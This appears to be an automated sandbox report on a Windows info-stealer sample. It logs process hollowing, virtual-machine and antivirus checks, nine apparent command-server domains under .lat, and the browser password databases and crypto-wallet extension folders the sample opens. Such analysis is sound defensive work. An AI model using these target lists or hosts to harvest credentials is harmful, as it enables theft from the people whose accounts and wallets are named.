                Source: NHEXQatKdE.exe, 00000004.00000003.2288598228.00000000034A6000.00000004.00000800.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000003.2470876760.00000000034A3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: NHEXQatKdE.exeReversingLabs: Detection: 60%
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile read: C:\Users\user\Desktop\NHEXQatKdE.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\NHEXQatKdE.exe "C:\Users\user\Desktop\NHEXQatKdE.exe"
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeProcess created: C:\Users\user\Desktop\NHEXQatKdE.exe "C:\Users\user\Desktop\NHEXQatKdE.exe"
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeProcess created: C:\Users\user\Desktop\NHEXQatKdE.exe "C:\Users\user\Desktop\NHEXQatKdE.exe"
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeProcess created: C:\Users\user\Desktop\NHEXQatKdE.exe "C:\Users\user\Desktop\NHEXQatKdE.exe"Jump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeProcess created: C:\Users\user\Desktop\NHEXQatKdE.exe "C:\Users\user\Desktop\NHEXQatKdE.exe"Jump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: NHEXQatKdE.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, TERMINAL_SERVER_AWARE
                Source: NHEXQatKdE.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: NHEXQatKdE.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: NHEXQatKdE.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: NHEXQatKdE.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: NHEXQatKdE.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: NHEXQatKdE.exeStatic PE information: section name: .ext
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 0_2_006EBC78 push ecx; ret 0_2_006EBC8B
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 3_2_006EBC78 push ecx; ret 3_2_006EBC8B
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_0043C830 push eax; mov dword ptr [esp], F5F4F3A2h4_2_0043C833
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_004438E8 push eax; retn 0041h4_2_004438E9
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_00443340 push eax; retn 0041h4_2_00443341
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_00443334 push eax; retn 0041h4_2_00443335
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_00443338 push eax; retn 0041h4_2_00443339
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_004424E8 pushfd ; iretd 4_2_004424ED
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_004455DB pushad ; iretd 4_2_0044560D
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_0044560E push ebp; retf 4_2_00445677
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exe TID: 2420Thread sleep time: -210000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exe TID: 2420Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 0_2_006EB12A FindFirstFileExW,0_2_006EB12A
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 0_2_006EB1DB FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_006EB1DB
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 3_2_006EB12A FindFirstFileExW,3_2_006EB12A
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 3_2_006EB1DB FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_006EB1DB
                Source: NHEXQatKdE.exe, 00000004.00000003.2470447666.00000000034A3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                Source: NHEXQatKdE.exe, 00000004.00000003.2470447666.00000000034A3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                Source: NHEXQatKdE.exe, 00000004.00000003.2470447666.00000000034A3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                Source: NHEXQatKdE.exe, 00000004.00000003.2470447666.00000000034A3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
                Source: NHEXQatKdE.exe, 00000004.00000003.2470447666.00000000034A3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
                Source: NHEXQatKdE.exe, 00000004.00000003.2470447666.00000000034A3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                Source: NHEXQatKdE.exe, 00000004.00000003.2470447666.00000000034A3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
                Source: NHEXQatKdE.exe, 00000004.00000003.2922613126.0000000000EBC000.00000004.00000020.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000003.2922841372.0000000000F07000.00000004.00000020.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000002.2923597402.0000000000F07000.00000004.00000020.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000002.2923597402.0000000000EBC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: NHEXQatKdE.exe, 00000004.00000003.2470447666.00000000034A3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                Source: NHEXQatKdE.exe, 00000004.00000003.2470447666.00000000034A3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                Source: NHEXQatKdE.exe, 00000004.00000003.2470447666.00000000034A3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
                Source: NHEXQatKdE.exe, 00000004.00000003.2470447666.00000000034A3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
                Source: NHEXQatKdE.exe, 00000004.00000003.2470447666.00000000034A8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696487552p
                Source: NHEXQatKdE.exe, 00000004.00000003.2470447666.00000000034A3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
                Source: NHEXQatKdE.exe, 00000004.00000003.2470447666.00000000034A3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                Source: NHEXQatKdE.exe, 00000004.00000003.2470447666.00000000034A3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
                Source: NHEXQatKdE.exe, 00000004.00000003.2470447666.00000000034A3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
                Source: NHEXQatKdE.exe, 00000004.00000003.2470447666.00000000034A3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                Source: NHEXQatKdE.exe, 00000004.00000003.2470447666.00000000034A3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                Source: NHEXQatKdE.exe, 00000004.00000003.2470447666.00000000034A3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                Source: NHEXQatKdE.exe, 00000004.00000003.2470447666.00000000034A3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                Source: NHEXQatKdE.exe, 00000004.00000003.2470447666.00000000034A3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                Source: NHEXQatKdE.exe, 00000004.00000003.2470447666.00000000034A3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                Source: NHEXQatKdE.exe, 00000004.00000003.2470447666.00000000034A3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
                Source: NHEXQatKdE.exe, 00000004.00000003.2470447666.00000000034A3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                Source: NHEXQatKdE.exe, 00000004.00000003.2470447666.00000000034A3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                Source: NHEXQatKdE.exe, 00000004.00000003.2470447666.00000000034A3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                Source: NHEXQatKdE.exe, 00000004.00000003.2470447666.00000000034A3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
                Source: NHEXQatKdE.exe, 00000004.00000003.2470447666.00000000034A3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                Source: NHEXQatKdE.exe, 00000004.00000003.2470447666.00000000034A3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                Source: NHEXQatKdE.exe, 00000004.00000003.2470447666.00000000034A3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                Source: NHEXQatKdE.exe, 00000004.00000003.2922841372.0000000000F07000.00000004.00000020.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000002.2923597402.0000000000F07000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW&-
                Source: NHEXQatKdE.exe, 00000004.00000003.2470447666.00000000034A3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                Source: NHEXQatKdE.exe, 00000004.00000003.2470447666.00000000034A3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_0043B1C0 LdrInitializeThunk,4_2_0043B1C0
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 0_2_006E2237 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_006E2237
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 0_2_006E15C1 mov edi, dword ptr fs:[00000030h]0_2_006E15C1
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 0_2_006FC19E mov edi, dword ptr fs:[00000030h]0_2_006FC19E
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 3_2_006E15C1 mov edi, dword ptr fs:[00000030h]3_2_006E15C1
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 0_2_006E723D GetProcessHeap,0_2_006E723D
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 0_2_006E222B SetUnhandledExceptionFilter,0_2_006E222B
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 0_2_006E2237 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_006E2237
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 0_2_006E631A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_006E631A
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 0_2_006E1BFF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_006E1BFF
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 3_2_006E222B SetUnhandledExceptionFilter,3_2_006E222B
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 3_2_006E2237 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_006E2237
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 3_2_006E631A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_006E631A
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 3_2_006E1BFF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_006E1BFF

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 0_2_006FC19E GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_006FC19E
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeMemory written: C:\Users\user\Desktop\NHEXQatKdE.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: NHEXQatKdE.exe, 00000000.00000002.2179942005.0000000002772000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: rapeflowwj.lat
                Source: NHEXQatKdE.exe, 00000000.00000002.2179942005.0000000002772000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: crosshuaht.lat
                Source: NHEXQatKdE.exe, 00000000.00000002.2179942005.0000000002772000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: sustainskelet.lat
                Source: NHEXQatKdE.exe, 00000000.00000002.2179942005.0000000002772000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: aspecteirs.lat
                Source: NHEXQatKdE.exe, 00000000.00000002.2179942005.0000000002772000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: energyaffai.lat
                Source: NHEXQatKdE.exe, 00000000.00000002.2179942005.0000000002772000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: necklacebudi.lat
                Source: NHEXQatKdE.exe, 00000000.00000002.2179942005.0000000002772000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: discokeyus.lat
                Source: NHEXQatKdE.exe, 00000000.00000002.2179942005.0000000002772000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: grannyejh.lat
                Source: NHEXQatKdE.exe, 00000000.00000002.2179942005.0000000002772000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: sweepyribs.lat
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeProcess created: C:\Users\user\Desktop\NHEXQatKdE.exe "C:\Users\user\Desktop\NHEXQatKdE.exe"Jump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeProcess created: C:\Users\user\Desktop\NHEXQatKdE.exe "C:\Users\user\Desktop\NHEXQatKdE.exe"Jump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 0_2_006E2113 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_006E2113
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: NHEXQatKdE.exe, 00000004.00000003.2718998682.0000000003491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: Process Memory Space: NHEXQatKdE.exe PID: 4156, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: NHEXQatKdE.exe, 00000004.00000003.2922841372.0000000000F07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum-LTC
                Source: NHEXQatKdE.exe, 00000004.00000003.2922841372.0000000000F07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                Source: NHEXQatKdE.exe, 00000004.00000003.2922841372.0000000000F07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: NHEXQatKdE.exe, 00000004.00000003.2560585694.0000000000F4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty
                Source: NHEXQatKdE.exe, 00000004.00000003.2718890653.0000000000F5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
                Source: NHEXQatKdE.exe, 00000004.00000003.2922841372.0000000000F07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
                Source: NHEXQatKdE.exe, 00000004.00000003.2560508442.0000000000F54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: NHEXQatKdE.exe, 00000004.00000003.2560565411.0000000000F5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
